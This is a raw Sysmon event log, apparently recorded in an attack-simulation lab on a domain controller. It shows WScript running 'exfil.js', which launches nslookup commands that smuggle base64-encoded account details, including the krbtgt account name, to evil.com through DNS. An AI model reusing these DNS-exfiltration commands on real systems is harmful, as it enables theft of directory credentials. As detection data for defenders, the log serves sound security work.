10341000x8000000000000000204391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.926{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.926{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.926{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.926{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.926{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0942-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.926{2E1864BB-17A1-629A-783D-000000005F02}55524632C:\Windows\System32\WScript.exe{2E1864BB-17CD-629A-0942-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.932{2E1864BB-17CD-629A-0942-000000005F02}2236C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkty.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.926{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlybbqyvo.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000204383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.910{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE4FB9A4F346DC962D04860FCEE54BF9,SHA256=E88C433D4F1C2F27AFF3200F72BC8CB26DA574FDF8204C0F1CDFE406ACFE356F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.879{2E1864BB-17CD-629A-0742-000000005F02}77686148C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-0842-000000005F02}4784C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.879{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.863{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0842-000000005F02}4784C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.863{2E1864BB-17CD-629A-0642-000000005F02}70724176C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-0842-000000005F02}4784C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.877{2E1864BB-17CD-629A-0842-000000005F02}4784C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CD-629A-0642-000000005F02}7072C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlybbqyvo.tmp 2>&1 22542200x8000000000000000204374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.328{00000000-0000-0000-0000-000000000000}4572evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.173{00000000-0000-0000-0000-000000000000}7224evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.084{00000000-0000-0000-0000-000000000000}3008evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.986{00000000-0000-0000-0000-000000000000}2240evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.845{00000000-0000-0000-0000-000000000000}6652evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.763{00000000-0000-0000-0000-000000000000}7700evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000204368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.841{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-0742-000000005F02}7768C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.841{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-0742-000000005F02}7768C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.841{2E1864BB-17CD-629A-0742-000000005F02}77686148C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-0642-000000005F02}7072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.825{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0742-000000005F02}7768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.825{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0642-000000005F02}7072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.825{2E1864BB-17A1-629A-783D-000000005F02}55524360C:\Windows\System32\WScript.exe{2E1864BB-17CD-629A-0642-000000005F02}7072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.829{2E1864BB-17CD-629A-0642-000000005F02}7072C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlybbqyvo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.810{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfjcxa.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.794{2E1864BB-17CD-629A-0442-000000005F02}50607436C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-0542-000000005F02}2672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 